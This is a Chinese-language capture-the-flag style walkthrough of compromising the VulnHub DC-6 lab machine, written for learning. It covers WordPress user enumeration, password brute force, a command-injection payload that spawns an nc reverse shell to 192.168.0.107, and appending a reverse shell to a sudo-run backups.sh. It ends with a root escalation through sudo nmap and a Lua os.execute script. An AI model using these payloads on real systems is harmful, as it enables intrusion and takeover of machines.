VulnHub靶机 DC-6 打靶实战 渗透详细过程

2024-04-27 889 0

VulnHub靶机 DC-6 打靶 详细渗透过程

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-6,315/

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图

二、渗透测试

主机发现

通过使用arp-scan命令或者使用nmap命令进行主机发现

arp-scan -l

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图1

端口扫描

nmap -p- 192.168.0.106

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图2

开发22和80端口,且服务为SSH和HTTP服务,详细探测一下

nmap -p80 -sV -A 192.168.0.106
whatweb http://192.168.0.106

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图3

信息探测

发现此web服务采用WordPress CMS

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图4

访问web界面:访问前先配置一下hosts本地解析

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图5

修改完成后即可完成本地域名解析,成功访问,并通过浏览器插件信息收集到此网站的一些服务信息和版本信息

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图6

web渗透

通过信息收集得到使用WordPress CMS,那么直接使用kali的wpscan工具进行扫描探测,并枚举用户信息

wpscan --url http://wordy -e u

成功枚举出五位用户的信息,并保存到记事本当中

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图7

目录爆破

爆破网站的目录,获取信息

dirsearch -u http://wordy -i 200

发现网站的登录界面,进行访问

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图8

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图9

爆破后台密码

通过我们之前得到的用户名信息,可进行密码的爆破

ps:根据作者的提示,从密码字典当中保存以下密码,可节省时间

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图10

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan --url http://wordy -U user.txt -P passwords.txt

成功爆破出mark的用户名密码信息,登录后台

用户名:mark
密码:helpdesk01

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图11

成功登入后台,发现有可执行命令的地方,在Activity monitor插件处

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图12

反弹shell

此工具为ip测试工具,测试一下,输入127.0.0.1

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图13

可成功,那么接下来进行拼接系统命令,测试可否正常回显

127.0.0.1 | ls

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图14

发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听

//靶机:
127.0.0.1 | nc -e /bin/bash 192.168.0.107 8888

//kali
nc -lvvp 8888

由于输入长度有限制,可以修改前端代码或者使用burp直接修改数据包

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图15

或者使用burp修改数据包

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图16

成功接收shell,此shell权限为www-data权限,普通权限

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图17

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图18

搜集有价值信息

当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看

jens家目录下的文件为一个shell脚本,内容为打包网站的信息

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图19

SSH远程登录

mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham

ssh [email protected]

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图20

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图21

提权

查找suid权限内容

find / -perm -u=s -type f 2>/dev/null

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图22

sudo利用失败

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图23

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图24

/etc目录下也无可利用文件,/etc/passwd等文件均无法利用

反弹jens用户权限的shell 提权利用

sudo -l

查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图25

echo "nc -e /bin/bash 192.168.0.107 6666" >> backups.sh 

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图26

sudo -u jens /home/jens/backups.sh

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图27

kali端成功接收到shell

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图28

sudo -l 再次查看一下jens用户下的有无root用户可执行的命令或者脚本,发现存在nmap命令,并以root权限执行

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图29

接下来就是利用nmap进行提权,首先创建一个脚本

touch root_shell.sh
echo 'os.execute("/bin/sh")' > root_shell.sh
sudo nmap --script=root_shell.sh

成功提权,通关

VulnHub靶机 DC-6 打靶实战 渗透详细过程插图30

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论